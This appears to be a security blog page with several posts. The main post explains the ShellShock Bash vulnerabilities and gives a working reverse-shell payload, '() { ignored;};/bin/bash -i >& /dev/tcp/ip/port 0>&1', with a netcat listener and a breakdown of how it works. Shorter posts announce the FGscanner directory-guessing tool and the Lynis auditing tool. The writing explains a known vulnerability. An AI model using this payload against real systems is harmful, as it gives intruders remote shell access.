Exploiting ShellShock getting a reverse shell

A Bash Vulnerability (aka ShellShock) has been published two months ago (CVE-2014-6271 original release date 09/24/2014) reaching the highest score for Impact and Exploitability by NIST-NVD with the following overview:

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

The first patch released was partial and introduced another vulnerability (CVE-2014-7169 original release date 09/24/2014)  again with top score for Impact and Exploitability by NIST-NVD with the following overview (highlight is mine):

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271

Two months after, ShellShock is still on the wild, used to exploit thousands systems all around the net, installing php/perl/irc shell or any other malicious payload. This is possible because the original SehellShock vulnerability is now related to other five CVEs:

  • CVE-2014-6271 (Initial report)
  • CVE-2014-6277
  • CVE-2014-6278
  • CVE-2014-7169
  • CVE-2014-7186
  • CVE-2014-7187

The following image, taken from F5 Website, explain how ShellShock works and why it is very dangerous:

She

Basically,exploiting this vulnerability, you can run every command (or every commands sequence) , but in 90% of cases I found the final target as a shell installation, usually in five steps:

  1. Vulnerability exploiting
  2. Script (perl, bash, c, etc…) download from a remote site via wget, curl, etc…
  3. Script saving under /tmp
  4. Script execution
  5. Cleaning (remove /tmp original file)

In many cases this approach will fail because perl/php/c shell are detected and removed by security safeguards used to protect systems and remote sites could be blocked by Web Filtering policies. In recent days, however, I noticed a specific attack that does not use any malicious code, but only a system script:

() { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1

Let me explain better:

() { ignored;}; is the ShellShock exploit
/bin/bash -i is an interactive Bash session
>& /dev/tcp/ip/port redirect standard output and standard error to the remote host (i.e.: /dev/tcp/1.2.3.4/8080 redirect the bash session to IP 1.2.3.4 on TCP port 8080)
0>&1 read the satndard input. This should be 0<&1 but it works well in both cases

On the remote server a listener must be running: for testing I used  nc -l 8080 (netcat listening on port 8080)

This is a very interesting approach about exploiting ShellShock getting a reverse shell :)

FgScanner included in BlackArch Linux

FgScanner has been included in BlackArch Linux. What is BlackArch Linux ?

“BlackArch Linux is a lightweight expansion to Arch Linux for penetration testers and security researchers.

The repository contains 1059 tools. You can install tools individually or in groups. BlackArch is compatible with existing Arch installs. For more information, see the installation instructions. Please note that although BlackArch is past the beta stage, it is still a relatively new project. To report bugs and request new tools, please visit the issue tracker on Github, stop by IRC, or email us.”

[Read more…]

FGscanner is available for Download

Hi All!
I finally completed FGscanner  :)
FGscanner is a perl script useful for finding directories that are not indexed, hidden pages, development or test folders on a webserver. The script works in dictionary attack mode using two files (fg_dirs and fg_pages) and can be redirect via proxy or tor network if there is a tor daemon running on your system.

The project is hosted on GitHub and you can download it here.

This is the initial release and any comment, contribution or suggestion is more than welcome ! :)

 

Check systems security with Lynis

How many times have you wondered about your systems security ? Using Linux or Mac is not enough! You must check and configure your systems to be as secure as possible. To do this we can use Lynis, a command-line utility to check  system(s) against malware, system misconfigurations, systems integrity, etc…
Lynis is easy to install and is available for Debian like and RedHat like distros, FreeBSD and MacOSX. 

As well explained on rootkit.nl website “Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.

This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems. It can be run without prior installation, so inclusion on read only storage is no problem (USB stick, cd/dvd).

Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOX (Sarbanes-Oxley) compliance audits.”

In this article I’ll show you how to install and run Lynis on your PC.

[Read more…]